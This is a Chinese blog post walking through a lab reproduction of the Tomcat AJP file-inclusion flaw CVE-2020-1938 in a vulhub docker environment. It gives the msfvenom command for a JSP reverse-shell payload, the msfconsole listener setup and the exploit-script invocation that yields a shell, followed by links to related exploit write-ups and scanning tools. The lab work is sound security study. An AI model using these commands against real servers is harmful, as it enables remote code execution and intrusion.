CVE-2020-1938

于 2023-12-24 15:04:31 发布
阅读量238 收藏
点赞数 1
文章标签: 安全 计算机网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46239998/article/details/135182073
版权

一、环境搭建

机器:kali Linux

Java:jdk11

python:2.7.x

漏洞复现情景:https://github.com/vulhub/vulhub

二、用docker开启漏洞环境

笔者这里是修改了端口,一开始开启环境是默认端口应为8080

用docker-compose开启环境前,先安装docker和docker-compose

docker部署链接:

https://blog.csdn.net/m0_67844671/article/details/132872790

三、下载脚本

脚本下载地址:

https://github.com/fairyming/CVE-2020-1938

四、查看脚本用法

五、尝试利用脚本文件包含

六、利用msfvenom生成木马

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.217.128 LPORT=4444 R > muma.txt

七、利用docker复制木马进去容器内部模拟文件上传成功

docker cp muma.txt 188fb6f53492:/usr/local/tomcat/webapps/ROOT/muma.txt

上传成功如下图所示:

八、利用msfconsole开启监听

msfconsole

handler -p java/jsp_shell_reverse_tcp -H 0.0.0.0 -P 4444

九、利用脚本getshell

python2 CVE-2020-1938.py 192.168.217.128 -p 8009 -f /muma.txt -c 1

十、回到msfconsole查看是否有会话

如上图所示即反弹shell成功!

黄公子学安全
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2020-1938 Tomcat 文件读取包含漏洞复现
yzl_007的博客
07-26 2493
CVE-2020-1938 Tomcat 文件读取包含漏洞复现 一次偶然的契机,起源于自己的站被日了,太菜了没找到原因,然后逛了逛室友的站,室友的友链中随便点了点友链什么的,发现shadon发现开了很多端口,并且同时打开了8009和8080 想到最近爆出的文件包含漏洞,扫一下果真存在,也验证成功了,读取到了web.xml的源码 用网上的脚本跑一下,读取WEB-INF/web.xml文件 读取ROOT目录下的build.xml文件内容,没用这个文件,就会跳转到错误页面 下面是自己搭建环境后的CVE-
【Tomcat】CVE-2020-1938 漏洞复现&解决
yjw2017的博客
09-14 921
Tomcat默认开启AJP服务(8009端口),存在一处文件包含缺陷。攻击者可以通过构造的恶意请求包来进行文件包含操作,从而读取或包含Tomcat上所有webapp目录下的任意文件,如:webapp配置文件或源代码等
CVE-2020-1938 Tomcat任意文件读取漏洞复现
永远是少年
01-05 728
今天继续给大家介绍渗透测试相关知识,本文主要内容是CVE-2020-1938 Tomcat任意文件读取漏洞复现。 一、CVE-2020-1938漏洞简介与环境搭建 二、CVE-2020-1938漏洞复现
CVE-2020-1938任意文件读取漏洞复现
热门推荐
weixin_45715461的博客
05-30 1万+
CVE-2020-1938任意文件读取漏洞复现
Tomcat 文件读取/文件包含漏洞复现(CVE-2020-1938
oiadkt的博客
04-12 1576
Tomcat 文件读取/文件包含漏洞复现(CVE-2020-1938
【网络安全---漏洞复现】Tomcat CVE-2020-1938 漏洞复现和利用过程(特详细)
m0_67844671的博客
09-12 8544
Tomcat CVE-2020-1938 漏洞复现和利用过程(特详细);Apache Tomcat文件包含漏洞(CNVD-2020-10487/CVE-2020-1938)。该漏洞是由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件。若目标服务器同时存在文件上传功能,攻击者可进一步实现远程代码执行。AJP(Apache JServ Protocol)是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。WEB服务器通过 TCP连接
CVE-2020-1938 Apache Tomcat 文件包含漏洞复现
weixin_43102772的博客
03-09 4969
CVE-2020-1938 Apache Tomcat 文件包含漏洞复现
CVE-2020-1938:CVE-2020-1938
03-20
CVE-2020-1938 工具仅用于安全研究以及内部自查,禁止使用工具发起非法攻击,造成的后果由用户负责 通过测试研究发现,该突破危害及其严重,涉及非常广泛,如果发现建议立即进行修复 apache-tomcat-8.5.32.zip测试...
CVE-2020-1938.zip
04-15
CVE-2020-1938 AJP 文件包含利用脚本,可读取网站文件源代码,满足相应条件可以任意命令执行,反弹shell
CVE-2020-1938.py
01-23
CVE-2020-1938.py
CVE-2020-1938 漏洞利用工具(POC)
09-12
通过Python 执行POC可以轻松读取存在漏洞服务器上的文件或编译执行木马文件
CVE-2020-1938TomcatAjpScanner-master.zip
02-23
CVE-2020-1938 tomcat漏洞批量扫描攻击!CVE-2020-1938 tomcat漏洞批量扫描攻击!CVE-2020-1938 tomcat漏洞批量扫描攻击!CVE-2020-1938 tomcat漏洞批量扫描攻击!CVE-2020-1938 tomcat漏洞批量扫描攻击!
Apache Tomcat CVE-2020-1938 漏洞
m0_54866636的博客
09-09 1157
深知大多数初中级Java工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但对于培训机构动则近万的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《Java开发全套学习资料》送给大家,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。
Tomcat AJP 文件包含漏洞(CVE-2020-1938
m0_61506558的博客
11-20 7506
1.漏洞简介1.漏洞简介2020年2月20日,公开CNVD 的漏洞公告中发现 Apache Tomcat文件包含漏洞(CVE-2020-1938)。是Apache开源组织开发的用于处理HTTP服务的项目。Apache Tomcat 服务器中被发现存在文件包含漏洞,攻击者可利用该漏洞读取或包含Tomcat上所有webapp目录下的任意文件。该漏洞是一个单独的文件包含漏洞,依赖于Tomcat的AJP(定向包协议)。AJP自身存在一定缺陷,导致存在可控参数。
CVE-2020-1938 漏洞复现
weixin_48799157的博客
05-21 3168
漏洞描述 Apache Tomcat是美国阿帕奇(Apache)软件基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。 Apache Tomcat 7.0.100之前的7.*版本、8.5.51之前的8.*版本和9.0.31之前的9.*版本中的Tomcat AJP协议存在文件包含漏洞。攻击者可利用该漏洞读取或包含Tomcat上所有webapp目录下的任意文件,如:webapp 配置文件或源代码等。 影响版本 Apache Tomcat
cve-2020-1938
最新发布
10-18
这是一个Apache Tomcat服务器上的漏洞,也称为Ghostcat漏洞。攻击者可以利用此漏洞读取服务器上的敏感文件,包括web.xml等配置文件。该漏洞影响Tomcat 6.x、7.x、8.x和9.x版本。 需要注意的是,该漏洞只能在AJP协议下利用,而且攻击者必须能够访问AJP协议端口(默认为8009)。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值